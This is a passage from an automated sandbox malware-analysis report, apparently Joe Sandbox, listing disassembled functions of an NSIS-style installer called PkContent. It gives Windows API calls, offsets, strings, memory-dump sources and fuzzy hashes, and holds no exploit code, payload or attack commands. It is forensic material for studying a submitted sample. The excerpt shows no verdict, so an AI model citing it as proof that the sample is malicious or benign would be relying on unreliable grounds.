                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                      • String ID:
                                                      • API String ID: 4115351271-0
                                                      • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                      • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                      • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                      • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                      APIs
                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                      • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                      • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                      • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                      • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                      • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                      • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                      APIs
                                                      • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                      • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                      • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                      • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                      • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                      • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                      • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                      • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                      • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                      • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                      • DeleteObject.GDI32(?), ref: 00404A79
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                      • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                      • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                      • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                      • ShowWindow.USER32(00000000), ref: 00404F5B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $ @$M$N
                                                      • API String ID: 1638840714-3479655940
                                                      • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                      • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                      • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                      • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                      • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                      • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                      • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                      • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                      • SetWindowTextW.USER32(?,?), ref: 00404583
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                      • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                      • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                        • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                        • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                        • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                      • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                      • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                      • String ID: 82D$@%F$@rD$A
                                                      • API String ID: 3347642858-1086125096
                                                      • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                      • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                      • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                      • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                      • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                      • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                      • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                      • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                      • CloseHandle.KERNEL32(?), ref: 004071E6
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                      • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                      • API String ID: 1916479912-1189179171
                                                      • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                      • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                      • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                      • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                      • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                      • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                      • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                      • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                      • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                      • FindClose.KERNEL32(?), ref: 00406E33
                                                      Strings
                                                      • \*.*, xrefs: 00406D03
                                                      • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                      • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                      • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                      • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                      • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                      • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                      • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                      • API String ID: 2035342205-3294556389
                                                      • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                      • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                      • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                      • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                      APIs
                                                      • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                      • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                      • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                      • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                      • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
